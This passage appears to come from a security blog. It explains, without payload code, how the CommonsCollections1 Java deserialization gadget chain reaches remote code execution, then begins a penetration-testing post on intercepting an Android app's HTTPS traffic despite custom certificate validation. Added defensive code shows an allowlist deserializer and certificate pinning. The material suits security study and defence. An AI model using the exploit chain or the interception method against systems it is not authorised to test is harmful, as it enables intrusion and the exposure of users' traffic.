The code path leading to code execution is described below and is also summarized in image 4.<br />
<br />
<ol style="text-align: left;">
<li>readObject() is called on the ObjectInputStream.</li>
<li>On method invocation, the JVM looks for the serialized object's class on the classpath. If the class is not found, a ClassNotFoundException is thrown. If the class is found, the readObject() method of the identified class (AnnotationInvocationHandler) is invoked. This process is repeated for every object type serialized in the CommonsCollections1 payload.</li>
<li>The readObject method of AnnotationInvocationHandler invokes the entrySet method on the MapProxy.</li>
<li>The method invocation on the proxy is forwarded to the AnnotationInvocationHandler attached to the MapProxy instance, along with the Method object and an empty argument array.</li>
<li>The LazyMap attempts to retrieve the value whose key equals the method name, "entrySet".</li>
<li>Since that key does not exist, the LazyMap instance goes ahead and tries to create a value for the new key "entrySet".</li>
<li>Since a ChainedTransformer is configured to run during that value creation, the chained transformer carrying the malicious payload is invoked, leading to remote code execution.</li>
</ol>
<img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6SboQYGyvmS7-Oo3PyhaIB5ebAjiTPRjFhy7lfX-oZKEsurAcX45JElIv_6OtA7ovAv5ix54mtaNCIzCn1F-Na8Rf1oc_i3tqirU5-GOu0Y9nnXOkwVBNB9T9m9Yf80OPKu7Par5nc9hZ/s400/Exploit+Flow.png" width="400" /><br />
Image 4: Shows the code path to RCE<br />
<br />
<br />
The following three images show the actual code path traversed from AnnotationInvocationHandler class leading up to LazyMap's ChainedTransformer invocation, resulting in RCE.<br />
<br />
<img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi64aJ94k1kSWiAptue6p0c_4reM_Rdy2iRVRK9EXJPGfkL9VlTabipRQ0_tFLvgcQIWH0f0bUtNaalJi4cDhvZwXThRoUgwS1u7P-ASSXMv5T9XYAhEBEVCpOJ1AhRHtH4xlHTK9Rq-PiR/s400/readObject_AnnotationIH_entrySet.png" width="400" />
<br />
Image 5: Shows AnnotationInvocationHandler's readObject() method that calls entrySet() on mapProxy<br />
<br />
<br />
<img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6waVOp4mTRP8FwFJ0zXqXF20yV1E5swSsyi8ewJjXnYjM07TELS3vY-IoZwPG8Ktw2da28e53aVD7xnlwrblm8R_Zp15wg6hSLLDbiO8xIb2CAlwnspeu1Gor65OsXxXOcT3c7Y04c-rc/s400/invoke_AnnotationIH_get.png" width="400" />
<br />
Image 6: Shows AnnotationInvocationHandler's invoke method that was attached to the mapProxy<br />
<br />
<br />
<img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0C8oxODlox6bTUs9UJF5z7KZr6sCaweLRHbzuk_mZwzsIXersvALZfY6KuGBAsj7pcCoutqePr6fB7IP4vNheNTrw4b0UweyI0zedGOYgwrUfPaoFSK5h9wucV_6PxcqKz-nivF4GZWlW/s400/lazyMap_get.png" width="400" />
<br />
Image 7: Shows transformer invocation when a key is not present<br />
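The chain above only starts because readObject() loads and instantiates whatever class name the stream carries. One way to make the deserializeFromByteArray pattern safe, as an added example that is not code from the original post: a look-ahead ObjectInputStream that rejects every class outside an allowlist before its readObject() can run (the allowlist contents and the sample objects are this example's own choice).<br />

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

// Look-ahead deserialization: the class named in each stream descriptor is checked
// against an allowlist before the JVM loads it, so a gadget such as
// AnnotationInvocationHandler or LazyMap is never instantiated. Added example class.
public final class AllowlistObjectInputStream extends ObjectInputStream {
    // Every class (and Serializable superclass) the application legitimately expects
    // to read. Integer's descriptor is followed by Number's, so both must be listed.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
        "java.util.ArrayList", "java.lang.String", "java.lang.Integer", "java.lang.Number"));

    public AllowlistObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    // Called once per class descriptor in the stream, before the class is loaded
    // (that is, before step 2 of the chain above can reach the class's readObject()).
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!ALLOWED.contains(name)) {
            throw new InvalidClassException(name, "class is not on the deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    public static byte[] serializeToByteArray(Object object) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(object);
        }
        return bytes.toByteArray();
    }

    public static Object deserializeChecked(byte[] serialized) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowlistObjectInputStream(new ByteArrayInputStream(serialized))) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a list of a String and an Integer, all on the allowlist.
        List<Object> expected = new ArrayList<>();
        expected.add("order-id");
        expected.add(42);
        System.out.println("allowed:  " + deserializeChecked(serializeToByteArray(expected)));

        // A HashMap is harmless, but it is not on the allowlist, so it is refused before
        // HashMap.readObject() executes; a gadget class would be refused the same way.
        try {
            deserializeChecked(serializeToByteArray(new HashMap<String, String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        // JDK 9+ alternative without subclassing (JEP 290 serialization filters):
        //   in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
        //       "java.util.ArrayList;java.lang.String;java.lang.Integer;java.lang.Number;!*"));
    }
}
```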
<div>
<br /></div>
</div>
Gursev Singh Kalra, http://www.blogger.com/profile/11125392470187170013<br />
Published 2013-11-05T09:35:00.001-08:00, updated 2013-11-05T11:43:27.364-08:00<br />
Patching an Android Application to Bypass Custom Certificate Validation<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">One of the important tasks while performing mobile application security assessments is to intercept the traffic (Man in The Middle, MiTM) between the mobile application and the server using a web proxy such as Fiddler or Burp. This allows the penetration tester to observe application behavior, modify the traffic and overcome the input restrictions enforced by the application’s user interface to perform a holistic penetration test. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mobile applications exchanging sensitive data typically use the </span><a href="http://en.wikipedia.org/wiki/HTTP_Secure" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">HTTPS</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> protocol for data exchange, as it allows them to authenticate the server and establish a secure communication channel. The client authenticates the server by verifying the server’s certificate against its trusted root </span><a href="http://en.wikipedia.org/wiki/Certificate_authority" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">certificate authority</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (CA) store and by checking the certificate’s common name against the domain name of the server presenting the certificate. 
To perform MiTM on a mobile application’s HTTPS traffic, the web proxy’s certificate is imported into the trusted root CA store; otherwise the application may not function due to certificate errors. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On a recent Android application assessment, I set up a web proxy to intercept the mobile application’s SSL traffic by importing its certificate into the device’s trusted root CA store. To ensure that the imported CA certificate worked, I used Android’s browser to visit a couple of SSL-based websites, and the browser accepted the MiTM’ed traffic without complaint. Typically, native Android applications also use the common trusted root CA store to validate server certificates, so no extra work is required to intercept their traffic. However, the application I was testing was different, as we will see below.</span></div>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Analyzing the Unsuccessful MiTM</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When I launched the application and attempted to pass its traffic through the web proxy, it displayed an error screen indicating that it could not connect to the remote server, either because there was no internet connection or because a connection could not be established for unknown reasons. Things were not adding up, as this configuration has mostly worked in the past, so I turned to analyzing system logs and SSL cipher suite support.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Logcat</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<a href="http://developer.android.com/tools/help/logcat.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Logcat</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is Android’s logging mechanism, used to view application debug messages and logs. I ran </span><a href="http://developer.android.com/tools/help/adb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">adb</span></a><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> logcat</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to check whether the application under test produced any stack trace indicating the cause of the error, but there was none. The application also did not leave any debug logs, indicating that the developers did a good job with error handling and did not write debug messages that could expose the application’s internal workings to prying eyes.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Common SSL Cipher suites</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When a web proxy acts as a MiTM between the client and the server, it establishes two SSL communication channels. One channel is with the client, to receive requests and return responses; the second channel forwards the application’s requests to the server and receives the server’s responses. To establish these channels, the web proxy has to agree on common SSL cipher suites with both the client and the server, and these cipher suites need not be the same, as shown in the image below.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidrsFSafSQvRzeVdmWoeuDbRR7x8b8muOq-a9qhvtK6fs8BOXkQvrzEVkvQwgXYBqbnbEFF4OOc13NKDXUZOxl1xT4S0B1HV9HAroP-CrEMXy8-KRL7erkXW3RlY4OBfMsq-DxwW98pDWi/s1600/Drawing1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidrsFSafSQvRzeVdmWoeuDbRR7x8b8muOq-a9qhvtK6fs8BOXkQvrzEVkvQwgXYBqbnbEFF4OOc13NKDXUZOxl1xT4S0B1HV9HAroP-CrEMXy8-KRL7erkXW3RlY4OBfMsq-DxwW98pDWi/s400/Drawing1.jpg" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 17px; line-height: 1.1500000000000001; white-space: pre-wrap;">In the past, I have observed SSL proxying errors in one or both of the following scenarios, either of which prevents a communication channel from being established.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Android application and the web proxy do not share any common SSL cipher suite. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The web proxy and the server do not share any common SSL cipher suite. </span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In both scenarios, the communication channel cannot be established and the application does not work. To analyze these scenarios, I fired up Wireshark to inspect the SSL handshake between the application and the web proxy, and discovered that they shared common SSL cipher suites.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With the first scenario ruled out, I issued an HTTPS request to the server through the web proxy, which worked without any errors, indicating that the web proxy and the server shared common SSL cipher suites.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">So the web proxy was capable of performing MiTM for the test application, and something else was going on under the hood.</span></div>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Custom Certificate Validation</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It was at this point that I started to look into the possibility of the application performing custom certificate validation to prevent a MiTM from monitoring or modifying its traffic. HTTPS clients can perform custom certificate validation by implementing the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> interface and then using it for their HTTPS connections. The process of creating HTTPS connections with custom certificate validation is summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Implement methods of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> interface as required. The server certificate validation code will live inside the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method. This method will throw an exception if the certificate validation fails or will return </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">void</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> otherwise.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create an instance of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation and use it to initialize </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">instance.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Provide the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">setSSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance will then communicate with the server and invoke the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method to perform custom server certificate validation.</span></div>
</li>
</ol>
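The six steps above, carried through in a trust manager that does what custom validation is for: it keeps the platform's normal chain validation and additionally pins the server's public key, so a proxy certificate signed by an imported root is still refused. This is an added example and not the application's code; the class name, the pin format (SHA-256 of the SubjectPublicKeyInfo, Base64) and the sample keys are this example's own.<br />

```java
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.KeyPairGenerator;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PublicKey;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Base64;
import java.util.Collections;
import java.util.Set;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

// Custom X509TrustManager that keeps the platform's normal chain validation and adds a
// public-key pin for the leaf certificate. Hypothetical example class, not the app's code.
public final class PinningTrustManager implements X509TrustManager {
    private final X509TrustManager platformTrustManager;
    private final Set<String> pinnedSpkiSha256;

    public PinningTrustManager(Set<String> pins) throws GeneralSecurityException {
        // A null KeyStore selects the device's trusted root CA store, the one the browser used.
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);
        X509TrustManager found = null;
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) { found = (X509TrustManager) tm; break; }
        }
        if (found == null) throw new GeneralSecurityException("no platform X509TrustManager available");
        this.platformTrustManager = found;
        this.pinnedSpkiSha256 = Collections.unmodifiableSet(pins);
    }

    // Step 1 of the post: throw if validation fails, return normally otherwise.
    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // Chain building, signatures and expiry against the trusted root CA store first...
        platformTrustManager.checkServerTrusted(chain, authType);
        // ...then the pin on chain[0], the server's own certificate. Hostname matching stays
        // with HttpsURLConnection's HostnameVerifier; it is not the trust manager's job.
        if (!matchesPin(chain[0].getPublicKey(), pinnedSpkiSha256)) {
            throw new CertificateException("server public key does not match any pinned SPKI hash");
        }
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        platformTrustManager.checkClientTrusted(chain, authType);
    }
    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return platformTrustManager.getAcceptedIssuers();
    }

    // SHA-256 over the DER-encoded SubjectPublicKeyInfo, Base64 encoded: the usual pin format.
    public static String spkiSha256(PublicKey key) throws CertificateException {
        try {
            return Base64.getEncoder().encodeToString(MessageDigest.getInstance("SHA-256").digest(key.getEncoded()));
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    public static boolean matchesPin(PublicKey key, Set<String> pins) throws CertificateException {
        byte[] actual = spkiSha256(key).getBytes(StandardCharsets.US_ASCII);
        for (String pin : pins) {
            // Constant-time comparison so the check does not leak how much of a pin matched.
            if (MessageDigest.isEqual(actual, pin.getBytes(StandardCharsets.US_ASCII))) return true;
        }
        return false;
    }

    // Steps 2 to 5 of the post: SSLContext, init with the trust manager, socket factory, connection.
    public static HttpsURLConnection open(URL url, Set<String> pins) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new PinningTrustManager(pins) }, null);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        return conn; // step 6: checkServerTrusted runs when connect() performs the TLS handshake
    }

    // Offline demonstration: generated keys stand in for the server's key and an unknown key.
    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        PublicKey serverKey = kpg.generateKeyPair().getPublic();
        PublicKey unknownKey = kpg.generateKeyPair().getPublic();
        Set<String> pins = Collections.singleton(spkiSha256(serverKey));
        System.out.println("server key accepted:  " + matchesPin(serverKey, pins));
        System.out.println("unknown key accepted: " + matchesPin(unknownKey, pins));
        // Real use (placeholder host, not contacted here): open(new URL("https://api.example.invalid/"), pins).connect();
    }
}
```

On Android builds below API 26, java.util.Base64 is unavailable and android.util.Base64 does the same job.<br />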
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
